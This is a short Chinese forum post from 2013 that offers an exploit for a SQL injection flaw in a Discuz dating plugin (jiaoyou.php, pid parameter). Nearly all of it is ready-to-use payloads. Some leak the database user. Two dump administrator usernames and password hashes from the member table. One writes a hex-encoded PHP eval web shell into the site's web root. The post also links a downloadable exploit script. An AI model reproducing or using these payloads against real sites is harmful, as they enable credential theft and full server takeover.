服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2013-5-28 15:38:49

Discuz交友插件漏洞附EXP

<P>DZ交友插件漏洞jiaoyou.php?pid=1</P>
<P>有的注入需要登录,注入代码如下:</P><PRE>' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1</PRE>
<P>爆管理账号密码方法一:</P><PRE>' or @`'` and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(username,0x24,password) as char),0x27,0x7e) FROM pre_common_member LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1</PRE>
<P>爆管理账号密码方法二:</P><PRE>' or @`'` and(select 1 from(select count(*),concat((select (select concat(username,0x24,password,0x24) from pre_common_member whereuid=1 limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1</PRE>
<P>root权限写shell:</P><PRE>' or @`'` union select 1,0x3C3F706870206576616C28245F504F53545B635D293F3E,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23into outfile 'D:\\wwwroot\\gzcity2\\t.php'-- where 1 or @`'` and '1'='1</PRE>
<P>初学php,写了个简单的exp:<BR><A href="http://www.opsers.com/wp-content/uploads/2013/04/DiscuzSQL.zip"><FONT color=#333333>DiscuzSQL</FONT></A></P>
页: [1]
查看完整版本: Discuz交友插件漏洞附EXP